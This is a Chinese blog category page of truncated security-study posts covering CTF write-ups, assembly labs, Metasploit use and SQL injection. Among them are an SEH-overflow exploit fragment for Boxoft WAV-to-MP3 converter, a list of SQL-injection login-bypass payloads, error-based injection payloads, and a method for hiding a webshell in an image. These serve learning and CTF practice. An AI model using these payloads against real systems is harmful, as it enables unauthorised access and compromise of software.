Information Security
文章平均质量分 58
JacobTsang
Feel free to contact me!
QQ:853802088
展开
-
Internet Settings | proxy服务器端口被持续劫持到特殊端口
每次我过FW的时候,就给我把代理端口给改成了127.0.0.1:1081,然后脚本地址改成1082/pac/?t=132628。我仔细一想这应该是以前v2ray的PAC(proxy auto config)配置残留。内心一万句mmp,啥啊,这玩意到现在都还有残留,这么毒吗?但不可能啊!我的v2ray早卸了。于是想着,这玩意应该把我注册表改了?去以下路径找找吧。HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet .原创 2021-04-14 11:18:32 · 2594 阅读 · 1 评论 -
matasploit框架漏洞利用
Kali:192.168.163.144XP:192.168.163.136XP关闭防火墙,测试两机器是否ping通。msf > search ms08_067[!] Module database cache not built yet, using slow searchMatching Modules================ Name ...原创 2019-11-29 12:04:44 · 437 阅读 · 0 评论 -
.NET framework 是什么? 有何意义?
.NET is a framework that Microsoft has introduced to develop applications easily. A framework can be understood as a collection of Application Programming Interfaces (APIs) and a set of code that a pr...原创 2019-11-12 21:24:01 · 5371 阅读 · 0 评论 -
Wireshark修改数据包
新版本不行。旧版本可以:https://www.wireshark.org/download/win64/all-versions/Wireshark-win64-1.12.8.exe原创 2019-11-08 11:08:42 · 21801 阅读 · 3 评论 -
DOSBOX 查看 FLAG寄存器
转载 2019-10-24 20:08:29 · 2439 阅读 · 1 评论 -
密码学 | 加盐
What is MD5 Salt and How to Use It?In cryptography, salt is a random string that you add to an input word, to generate a different hash that with the word alone.在密码学中,盐是一个随机的字符串,你可以将盐加到你所输入的字符串中,(密码...原创 2019-10-20 10:02:37 · 797 阅读 · 0 评论 -
Kali Linux 安装 arm-linux-gcc交叉编译工具
┗|`O′|┛ 嗷~~ 安装的虚拟机太多了,我不。果断继续用我的小Kali。但接下来要运行的命令是arm-linux-gcc而非gccgcc是Kali自带的X86架构的编译器,而非arm。root@localhost:mkdir /usr/local/arm root@localhost:mv tar -zxvf arm-linux-gcc-4.5.1-v6-vfp-20101103.t...原创 2019-10-17 19:07:46 · 2754 阅读 · 0 评论 -
汇编实现登陆界面密码无回显
.486DATA SEGMENT USE16BUF1 DB 255 ;用于存取键入的用户名 DB ? DB 255 DUP(?) BUF2 DB 255 ;用于存取键入的密码 DB ? DB 255 DUP(?) USER DB 'Jacob' ;用户名内置校验值 ;4A 61 63 6F 62 LEN1 = $-USER ;内置用户名长度PASSWD ...原创 2019-10-15 18:51:06 · 672 阅读 · 0 评论 -
sql报错注入原理分析
研究人员发现,使用group by子句结合rand()函数以及像count(*)这样的聚合函数,在SQL查询时会出现错误,且错误是随机产生的,这就产生了双重查询注入。到底为什么floor()、rand(0)、count()、group by相结合,会产生这种错误呢?转载以前乌云一位哥的文章:种子值为0的rand()函数的输出几乎固定为01101Okay let get is strai...原创 2019-10-13 10:24:39 · 1359 阅读 · 1 评论 -
Boxoft wav to mp3 converter SEH bypass technique tested on XP SP3
#一定要用Python2进行编译。否则Exploit无效。Python2 Exploit:f = open("Expolit.aiff", "w")f.write("A" * 4132) # 4136 - 4f.write("\xeb\x06\x90\x90") # jmp 06 nop nopf.write("\xa4\x43\x40\x00") # 构造 pop pop ret ...原创 2019-10-08 15:05:00 · 1023 阅读 · 1 评论 -
win2000下实现绕过SEH机制栈溢出弹出计算器
实验出处:《0day安全:软件漏洞分析技术(第2版)》实验环境:步骤一:VMware中安装Windows 2000 server镜像链接:https://pan.baidu.com/s/1OREE1sMnwZWm06sJEYQDLA提取码:2zya安装vmtools前要以挂在ISO的方式打个补丁补丁链接:https://pan.baidu.com/s/10UUB5VwjVJ14l...原创 2019-10-08 09:57:02 · 507 阅读 · 0 评论 -
图片隐写 | 图片马制作
cmd下执行:copy x.gif /b + x.txt /a y.gif原创 2019-10-06 10:07:09 · 1071 阅读 · 1 评论 -
Masm for Windows集成环境 DOSBox界面太小 | 找不到Doxbox.option
Masm for windows download link:链接: https://pan.baidu.com/s/11OIJKh_Ww2U3DeG5CNriFA 提取码: cf3x编写汇编语言最好用的IDE莫过于微软公司的集成环境,内嵌一个DOSBox。解决在DOSBOX下.586,USE16报错的问题。但是如何修改内嵌DOXBox的界面大小呢?如图下所示。windowresolutio...原创 2019-10-04 14:28:16 · 3097 阅读 · 2 评论 -
Linux加固 | Ubuntu修改.bash_history的默认保留历史命令行数
cat ~/.bash_historyvim /etc/bash.bashrc原创 2019-10-03 15:46:18 · 878 阅读 · 0 评论 -
Session和Cookie的区别
https://blog.csdn.net/zwq912318834/article/details/79571110转载 2019-10-09 19:33:30 · 97 阅读 · 0 评论 -
Docker架设内网主机并映射80端口到公网
root@VM-0-3-ubuntu:/# curl -fsSL https://get.docker.com | sh #下载Dockerroot@VM-0-3-ubuntu:/# systemctl start docker #启动Dockerroot@VM-0-3-ubuntu:/# systemctl status docker #查看Docker运行状态roo...原创 2019-10-02 17:19:16 · 3336 阅读 · 0 评论 -
Chrome 开发者工具官方文档
https://developers.google.com/web/tools/chrome-devtools原创 2019-10-09 10:16:20 · 679 阅读 · 0 评论 -
目录扫描
1、御剑 ( 国内站 )2、dirsearch ( 国外站 )#git clone https://github.com/maurosoria/dirsearch#cd dirsearch/#python3 dirsearch.py -u "http://localhost/" -e *参数列表:-h, --help 查看帮助-u URL, --url=URL 设置url...原创 2019-10-09 15:49:35 · 1183 阅读 · 0 评论 -
寻找sql注入点
1、GoogleHacking撒网2、特定站点:源代码Ctrl + F :php?id=原创 2019-10-09 15:51:33 · 1812 阅读 · 0 评论 -
CTF | 你好慢啊 | python post data
import requestsimport hashlibimport reurl="xxxxx"r=requests.session()out=r.get(url)rr = re.compile(r"<h3 align='center'>(\S+)</h3>", re.I)str1 = rr.findall(out.text)str2=hashlib...原创 2019-10-09 19:03:57 · 493 阅读 · 0 评论 -
SQL注入万能密码字典
"or "a"="a'.).or.('.a.'='.a or 1=1--'or 1=1--a'or' 1=1--"or 1=1--'or.'a.'='a"or"="a'='a'or''=''or'='or'admin'or 1=1#admin'/*aaaa*/''or 1=1/*"or "a"="a"or 1=1--"or"=""or"="a'='a"or1=1...原创 2019-10-09 20:31:43 · 6059 阅读 · 0 评论 -
sql | “弱类型” | 隐匿转换
mysql> desc users;+----------+-------------+------+-----+---------+----------------+| Field | Type | Null | Key | Default | Extra |+----------+-------------+------+-----+-----...原创 2019-10-10 20:17:00 · 346 阅读 · 0 评论 -
SQL注入 | mysql写入文件 | 读取文件
mysql 新版本下secure-file-priv字段 : secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。ure_file_priv的值为null ,表示限制mysqld 不允许导入|导出。当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生...原创 2019-10-11 14:16:57 · 2987 阅读 · 1 评论 -
PWN入门教程分享
Linux pwn入门教程(1)——栈溢出基础URL:https://bbs.ichunqiu.com/forum.php?mod=viewthread&amp;tid=42241&amp;highlight=pwnLinux pwn入门教程(2)——shellcode的使用,原理与变形URL:https://bbs.ichunqiu.com/forum.php?mod=viewthread...转载 2018-10-21 10:52:37 · 3245 阅读 · 0 评论 -
GET可传参到后台而,POST无法传数据到后台。
原因:不可以只改左上角的GET。要change request method,因为POST传参默认是带着content-type的,不写则后台无法处理这个包。原创 2019-10-01 20:41:21 · 834 阅读 · 3 评论 -
汇编实验1
(1)要求实验者按照原样对源程序进行编辑,汇编后,根据TASM给出的错误信息对源程序进行修改,直到没有语法错误为止。然后进行链接,并执行相应的可执行文件。正确的执行结果是在屏幕上显示:25+9=34。DATA SEGMENT SUM DB ?,?MESG DB '25+9=' DB 0,0,'$'N1 DB 9,0F0HN2 DW 25DATA ENDSCODE...原创 2019-09-29 16:55:34 · 3463 阅读 · 1 评论 -
MySQL | SQLserver 默认数据库 默认表
MySQL的默认数据库默认数据库分类:information_schemaperformance_schemamysqltestinformance_schema保存了MySQl服务所有数据库的信息。具体MySQL服务有多少个数据库,各个数据库有哪些表,各个表中的字段是什么数据类型,各个表中有哪些索引,各个数据库要什么权限才能访问。mysql保存MySQL的权限、参数、对象和...原创 2019-09-19 19:25:56 · 3319 阅读 · 0 评论 -
RSA | 模重复平方算法 | C语言实现
#include <stdio.h>/******************************************************************************模重复平方计算法 博文网址 http://blog.csdn.net/yxtxiaotian/article/details/52464496幂模算法(模重复平方算法),时间复杂度O(...转载 2019-06-22 21:27:41 · 2420 阅读 · 1 评论 -
《现代密码学教程》| 谷利泽 | 课后答案 | 个人整理
第一章 | 密码学概论第二章 | 密码学基础第三章 | 古典密码体制第四章 | 分组密码第五章 | 序列密码第六章 | Hash密码第七章 | 公钥密码体制第八章 | 数字密码签名第九章 | 密码协议第十章 | 密钥管理...原创 2019-06-25 21:15:58 · 26167 阅读 · 10 评论 -
古典密码体制 | 置换密码
1)置换密码:又称换位密码。将明文元素的位置进行系统的置换。密文所包含的字符集与明文字符集相同。最常见的两种类型:1、列置换密码 、2、周期置换密码1.1)列置换密码:明文遵照密钥规则按列换位,按列读出明文序列得到密文。加密:明文分段,不足则填充,根据密钥以列为单位进行互换,按行从左到右写出,得到密文。解密:密文分段,根据密钥逆置换以列为单位进行互换,按行从左到右写出,得到明文。...原创 2019-06-22 09:15:30 · 5795 阅读 · 1 评论 -
CTF竞赛技术 - CRYPTO从入门到放弃
CTF竞赛技术 - CRYPTO从入门到放弃CRYPTO是CTF中常见的一种题型,一般包括各种类型的密码学、编码、编程语言加密等知识点,有时候也会包含一些考验选手脑洞的题目。不常见的密码学知识文本加密方法栅栏密码(Rail-fence Cipher)栅栏密码(Rail-fence Cipher)就是把要加密的明文分成N个一组,然后把每组的第1个字符组合,每组第2个字符组合…每组的第N...转载 2018-10-20 15:17:38 · 3433 阅读 · 1 评论 -
实验吧 简单的登录题 之[ CBC翻转攻击 ] 详解
解题链接: http://ctf5.shiyanbar.com/web/jiandan/index.php1)Burpsuite抓包2)根据Tips,修改GET请求为test.php获得源码。3)代码审计这个是实验吧的源代码: define(&amp;amp;amp;quot;SECRET_KEY&amp;amp;amp;quot;, '***********'); define(&amp;amp;amp;原创 2018-10-28 16:58:55 · 1104 阅读 · 0 评论 -
实验吧 后台登录writeup
1)解题链接: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php2)php源码: <php? $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($passw...原创 2018-10-29 22:01:43 · 254 阅读 · 0 评论 -
SQL注入报错注入函数汇总
1.floor()id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)原理:https://blog.csdn.net/qq_35544379/article/details/774530192...转载 2018-10-30 16:33:17 · 2037 阅读 · 0 评论 -
SQL注入 | exp()函数报错
0x01原理当传递一个大于709的值时,函数exp()就会引起一个溢出错误。mysql> select exp(709);+-----------------------+| exp(709) |+-----------------------+| 8.218407461554972e307 |+-----------------------+1 r...转载 2018-10-30 19:08:34 · 6227 阅读 · 0 评论 -
实验吧 | 忘记密码了
解题链接: http://ctf5.shiyanbar.com/10/upload/常规套路:1)审计页面源代码,提取关键信息。Editor => Vim 意味着可能存在Swp交换文件。管理员邮箱为:admin@simplexue.com2)提交表单,Burpsuite抓取数据包猜测 " .submit.php.swp "存在view-source:http://ctf5...原创 2018-10-30 21:37:46 · 175 阅读 · 3 评论 -
IDC函数列表 | Alphabetical list of IDC functions
Alphabetical list of IDC functionsAlphabetical list of IDC functionsThe following conventions are used in the function descriptions: 'ea' is a linear address 'success' is 0 if a function fai...原创 2019-07-01 07:42:36 · 298 阅读 · 0 评论 -
Virtual Box屏幕显示模式热键
Right Ctrl + F – 切换到全屏模式Right Ctrl + L – 切换到无缝模式Right Ctrl + C – 切换到比例模式Right Ctrl + Home – 显示控制菜单原创 2019-08-03 20:13:15 · 621 阅读 · 0 评论 -
常用漏洞平台
美国1, 赛门铁克的漏洞库 https://www.securityfocus.com/2, 美国国家信息安全漏洞库 https://nvd.nist.gov/3, 全球信息安全漏洞指纹库与文件检测服务 http://cvescan.com4, 美国著名安全公司Offensive Security的漏洞库https://www.exploit-db.com/5,CVE(美国国土安全资助的...原创 2019-09-18 22:27:11 · 4129 阅读 · 0 评论 -
Google Hacking
原创 2019-09-18 21:58:14 · 98 阅读 · 0 评论